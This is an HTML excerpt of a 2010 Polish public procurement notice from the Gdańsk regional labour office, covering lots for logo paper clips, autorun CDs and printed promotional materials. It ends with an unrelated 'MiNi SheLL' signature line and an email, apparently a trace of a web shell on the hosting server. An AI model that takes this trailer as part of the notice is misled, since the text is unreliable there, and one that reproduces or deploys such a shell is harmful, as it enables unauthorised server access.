<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Klipy do papieru -  600 szt. klipów do papieru, metalowych, gumowych lub drewnianych, wytrzymałych wraz z nadrukiem logotypów w kolorze w miarę możliwości z dwóch stron (2 logotypy), przykłady klipów -  Załącznik nr 8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> usługi w zakresie promocji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stworzenie menu kontekstowego oraz nagranie 380 szt. płyt, na których znajdzie się: plik raportu pełnego (pdf), plik raportu skróconego (pdf), plik z tabelami (excel), plik z aneksem do raportu (word); stworzenie systemu autoodtwarzania płyt, w skład którego wejdzie: projekt graficzny i stworzenie menu kontekstowego (linki do załączonych plików). System autoodtwarzania należy zaprojektować zgodnie z layoutem przekazanym przez WUP (layout - Załącznik nr 9) - wraz z zakupem 1 zdjęcia z bazy iStockphoto nr: 7069075. Czyste płyty z nadrukiem, na które należy nagrać pliki będą do odbioru w Wojewódzkim Urzędzie Pracy w Gdańsku, ul. Podwale Przedmiejskie 30, pok. nr 117..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> wytworzenie materiałów informacyjno-promocyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stworzenie spójnego layoutu  materiałów informacyjnych wraz z zapewnieniem 1 zdjęcia z bazy zdjęć do wykorzystania we wszystkich materiałach, w tym:
a)	Teczki - projekt i druk teczek, nakład - 290 szt., format A4, gruby grzbiet 15 mm, papier karton 350 g/m2,  kolor 4/0, teczka zamykana na gumkę, 3 skrzydła, folia mat po zewn. stronie teczki.
b)	Notesy - projekt i druk notesów, nakład - 290 szt., format A4, 50 kartek, papier offset ok. 80 g na spodzie tekturowym,  nadruk - kolor 4/0, bloczki klejone po krótszym boku bez okładki
c)	Długopisy - 290 szt. metalowych długopisów z klipsem opatrzonych logotypami, wykonanie nadruku laserowego na korpusie po dwóch stronach, nadruk w 1 kolorze, niebieski wkład,  przykład długopisu - Załącznik nr 10
d)	Broszura 2xDL - projekt i druk broszury, nakład: 200 szt., format: 2xDL (20 cm x 21 cm) łamane do 10 cm x 21 cm,  papier - kreda mat, 135g, druk - kolor 4/4, lakier offsetowy
e)	Zaproszenia - projekt i druk zaproszeń, nakład - 200 szt., format A5 łamany na pół, papier ozdobny lub kreda mat zabezpieczona, 300g, kolor 4/4
f)	Dyplomy - projekt i druk dyplomów format A4, papier ozdobny 300g, druk kolor 4/0, nakład 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 79.82.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. jakość próbki - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com